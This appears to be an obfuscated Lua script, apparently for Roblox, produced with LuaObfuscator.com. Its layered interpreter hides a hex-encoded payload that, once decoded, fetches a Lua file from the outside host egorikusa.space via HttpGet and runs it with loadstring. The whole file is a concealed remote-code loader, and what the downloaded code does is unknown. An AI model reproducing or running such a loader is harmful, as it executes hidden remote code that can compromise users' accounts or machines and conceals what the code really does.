--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v87=0;local v88;while true do if (v87==1) then return v88;end if (v87==0) then v88=v5(v81,v19);v19=nil;v87=1;end end else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/((5 -3)^(v32-(2 -1))))%((3 -(878 -(282 + 595)))^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v82-(v82%((2206 -(1523 + 114)) -(367 + 201))) ;else local v83=(929 -(214 + 713))^(v32-1) ;return (((v31%(v83 + v83))>=v83) and (1 + 0 + 0)) or ((0 -0) + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + 0 ;local v36;local v37;while true do if (v35==(1066 -((418 -(87 + 263)) + 997))) then return (v37 * (1526 -((406 -(67 + 113)) + 1044))) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;v35=1 + 0 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + ((18 -11) -4) );v18=v18 + 3 + 1 ;return (v41 * 16777216) + (v40 * (260471 -194935)) + (v39 * (1208 -(802 + 150))) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,1 + 0 ,(833 + 184) -((1353 -(145 + 293)) + (854 -(201 + 571))) ) * ((5 -3)^32)) + v42 ;local v46=v20(v43,21,19 + 12 );local v47=((v20(v43,32)==(1 -0)) and  -(1188 -(1069 + 118))) or (2 -1) ;if (v46==((430 -(44 + 386)) -0)) then if (v45==(0 + 0)) then return v47 * (0 -0) ;else local v89=0 + (1486 -(998 + 488)) ;while true do if (v89==(791 -(368 + 423))) then v46=3 -2 ;v44=18 -(10 + 8) ;break;end end end elseif (v46==(7874 -(1852 + 3975))) then return ((v45==0) and (v47 * (1/(442 -(416 + 26))))) or (v47 * NaN) ;end return v8(v47,v46-(3266 -2243) ) * (v44 + (v45/((1 + 1)^(91 -(1177 -(116 + 1022)))))) ;end local function v25(v48) local v49=0 -0 ;local v50;local v51;while true do if (v49==(1 + 0)) then v50=v3(v16,v18,(v18 + v48) -(3 -2) );v18=v18 + v48 ;v49=1082 -(1020 + 60) ;end if (v49==(7 -5)) then v51={};for v90=(769 -(745 + 21)) -2 , #v50 do v51[v90]=v2(v1(v3(v50,v90,v90)));end v49=3;end if (v49==(0 -(0 + 0))) then v50=nil;if  not v48 then local v96=(2363 -1504) -(814 + (176 -131)) ;while true do if (v96==(0 -0)) then v48=v23();if (v48==(0 + 0)) then return "";end break;end end end v49=1 + 0 ;end if (v49==(888 -(261 + 624))) then return v6(v51);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if ((532 -(406 + 123))~=v52) then else v59=nil;v60=nil;v52=1773 -(1749 + 20) ;end if (v52~=(1 + 1)) then else v57=nil;v58=nil;v52=1325 -(1249 + 73) ;end if (v52~=1) then else v55=nil;v56=nil;v52=2;end if (v52~=(2 + 2)) then else while true do if (v53~=(1147 -(466 + 679))) then else v58=nil;v59=nil;v53=6 -3 ;end if (v53==0) then local v97=0 -0 ;while true do if (v97~=(1900 -(106 + 1794))) then else v54=0 + 0 ;v55=nil;v97=1 + 0 ;end if (v97~=1) then else v53=1;break;end end end if (v53~=3) then else v60=nil;while true do local v99=0;local v100;while true do if (v99==0) then v100=0 -0 ;while true do if (1==v100) then if (v54==2) then local v140=0 -0 ;while true do if (v140~=(114 -(4 + 110))) then else for v144=585 -(57 + 527) ,v23() do local v145=1427 -(41 + 1386) ;local v146;local v147;local v148;while true do if (v145==(103 -(17 + 86))) then v146=0;v147=nil;v145=1 + 0 ;end if ((1 -0)~=v145) then else v148=nil;while true do if (v146==0) then v147=0 -0 ;v148=nil;v146=1;end if ((167 -(122 + 44))~=v146) then else while true do if (v147==0) then v148=v21();if (v20(v148,1,1)==(0 -0)) then local v159=0 -0 ;local v160;local v161;local v162;local v163;local v164;while true do if (v159==2) then v164=nil;while true do if (0~=v160) then else local v168=0;while true do if (v168==(1 + 0)) then v160=1;break;end if (v168==0) then v161=0 + 0 ;v162=nil;v168=1 -0 ;end end end if (v160==2) then while true do if (v161~=3) then else if (v20(v163,3,68 -(30 + 35) )==1) then v164[3 + 1 ]=v60[v164[1261 -(1043 + 214) ]];end v55[v144]=v164;break;end if (1==v161) then local v171=0 -0 ;local v172;while true do if (v171==(1212 -(323 + 889))) then v172=0 -0 ;while true do if (v172==0) then local v179=580 -(361 + 219) ;local v180;while true do if (v179~=0) then else v180=0;while true do if ((320 -(53 + 267))==v180) then v164={v22(),v22(),nil,nil};if (v162==(982 -(18 + 964))) then local v186=0 -0 ;local v187;while true do if (v186~=(0 + 0)) then else v187=0 + 0 ;while true do if (0==v187) then v164[853 -(20 + 830) ]=v22();v164[4]=v22();break;end end break;end end elseif (v162==(1 + 0)) then v164[129 -(116 + 10) ]=v23();elseif (v162==(1 + 1)) then v164[741 -(542 + 196) ]=v23() -((3 -1)^16) ;elseif (v162==3) then local v192=0 + 0 ;local v193;local v194;local v195;while true do if (v192==(0 + 0)) then v193=0 + 0 ;v194=nil;v192=1;end if (v192~=(2 -1)) then else v195=nil;while true do if (v193==1) then while true do if (v194~=(0 -0)) then else v195=1551 -(1126 + 425) ;while true do if ((405 -(118 + 287))==v195) then v164[3]=v23() -(2^(62 -46)) ;v164[4]=v22();break;end end break;end end break;end if (v193~=(1121 -(118 + 1003))) then else local v196=0 -0 ;while true do if (1~=v196) then else v193=378 -(142 + 235) ;break;end if (v196~=0) then else v194=0;v195=nil;v196=1;end end end end break;end end end v180=4 -3 ;end if (v180==(1 + 0)) then v172=1;break;end end break;end end end if (v172==1) then v161=2;break;end end break;end end end if (v161==0) then local v173=977 -(553 + 424) ;while true do if (v173==0) then local v177=0;while true do if (v177~=(1 -0)) then else v173=1;break;end if (v177==0) then local v181=0 + 0 ;while true do if (v181==(0 + 0)) then v162=v20(v148,2 + 0 ,3);v163=v20(v148,2 + 2 ,6);v181=1 + 0 ;end if ((2 -1)==v181) then v177=2 -1 ;break;end end end end end if (v173==(2 -1)) then v161=1 + 0 ;break;end end end if (v161==2) then local v174=0 -0 ;while true do if (v174==(754 -(239 + 514))) then v161=2 + 1 ;break;end if (v174~=0) then else local v178=0;while true do if (v178==(1329 -(797 + 532))) then if (v20(v163,1 + 0 ,1)==1) then v164[1 + 1 ]=v60[v164[2]];end if (v20(v163,2,2)==(2 -1)) then v164[1205 -(373 + 829) ]=v60[v164[3]];end v178=732 -(476 + 255) ;end if (v178==1) then v174=1131 -(369 + 761) ;break;end end end end end end break;end if (v160~=1) then else local v169=0;while true do if (v169~=(0 + 0)) then else v163=nil;v164=nil;v169=1 -0 ;end if (v169~=1) then else v160=2;break;end end end end break;end if (v159~=1) then else local v166=0 -0 ;while true do if (1~=v166) then else v159=240 -(64 + 174) ;break;end if (v166==0) then v162=nil;v163=nil;v166=1;end end end if (v159==(0 + 0)) then local v167=0 -0 ;while true do if (v167==0) then v160=336 -(144 + 192) ;v161=nil;v167=217 -(42 + 174) ;end if (v167==1) then v159=1 + 0 ;break;end end end end end break;end end break;end end break;end end end for v149=1,v23() do v56[v149-1 ]=v28();end v140=1;end if (v140==(1 + 0)) then return v58;end end end break;end if (0==v100) then if (v54==(0 + 0)) then local v141=0;while true do if (v141==0) then v55={};v56={};v141=1505 -(363 + 1141) ;end if (v141==(1581 -(1183 + 397))) then v57={};v58={v55,v56,nil,v57};v141=2 + 0 ;end if (v141~=(5 -3)) then else v54=1;break;end end end if (v54==1) then local v142=1933 -(565 + 1368) ;while true do if (v142==(7 -5)) then v54=1663 -(1477 + 184) ;break;end if ((1 -0)==v142) then for v151=1 + 0 ,v59 do local v152=856 -(564 + 292) ;local v153;local v154;local v155;while true do if (v152~=(1 -0)) then else v155=nil;while true do if (v153~=1) then else if (v154==1) then v155=v21()~=0 ;elseif (v154==(5 -3)) then v155=v24();elseif (v154~=3) then else v155=v25();end v60[v151]=v155;break;end if ((304 -(244 + 60))~=v153) then else local v157=0 + 0 ;local v158;while true do if (v157==(476 -(41 + 435))) then v158=1001 -(938 + 63) ;while true do if (0~=v158) then else local v165=0;while true do if (v165~=1) then else v158=1 + 0 ;break;end if (v165==(1125 -(936 + 189))) then v154=v21();v155=nil;v165=1;end end end if (v158==(1 + 0)) then v153=1;break;end end break;end end end end break;end if (v152==0) then v153=1613 -(1565 + 48) ;v154=nil;v152=1;end end end v58[2 + 1 ]=v21();v142=2;end if ((1138 -(782 + 356))~=v142) then else v59=v23();v60={};v142=268 -(176 + 91) ;end end end v100=2 -1 ;end end break;end end end break;end if (v53==(1 -0)) then local v98=1092 -(975 + 117) ;while true do if (v98==1) then v53=2;break;end if (v98==(1875 -(157 + 1718))) then v56=nil;v57=nil;v98=1;end end end end break;end if (v52~=0) then else v53=0 + 0 ;v54=nil;v52=1;end end end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...) local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v84=0,v75 do if (v84>=v69) then v73[v84-v69 ]=v74[v84 + 1 ];else v77[v84]=v74[v84 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=3) then if (v80<=1) then if (v80==0) then local v101=0;local v102;local v103;while true do if (v101==0) then v102=v79[2];v103=v77[v79[3]];v101=1;end if (v101==1) then v77[v102 + 1 ]=v103;v77[v102]=v103[v79[4]];break;end end else local v104;local v105,v106;local v107;local v108;v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v108=v79[2];v107=v77[v79[3]];v77[v108 + 1 ]=v107;v77[v108]=v107[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v108=v79[2];v105,v106=v70(v77[v108](v13(v77,v108 + 1 ,v79[3])));v72=(v106 + v108) -1 ;v104=0;for v128=v108,v72 do v104=v104 + 1 ;v77[v128]=v105[v104];end v71=v71 + 1 ;v79=v67[v71];v108=v79[2];v77[v108]=v77[v108](v13(v77,v108 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];do return;end end elseif (v80==2) then do return;end else local v118=v79[2];v77[v118]=v77[v118](v13(v77,v118 + 1 ,v72));end elseif (v80<=5) then if (v80==4) then v77[v79[2]]();else v77[v79[2]]=v79[3];end elseif (v80>6) then local v122=v79[2];local v123,v124=v70(v77[v122](v13(v77,v122 + 1 ,v79[3])));v72=(v124 + v122) -1 ;local v125=0;for v131=v122,v72 do local v132=0;while true do if (v132==0) then v125=v125 + 1 ;v77[v131]=v123[v125];break;end end end else v77[v79[2]]=v63[v79[3]];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403343O00682O7470733A2O2F65676F72696B7573612E73706163652F6239303765343237343864376362653438653135643539342E6C756100083O0012013O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
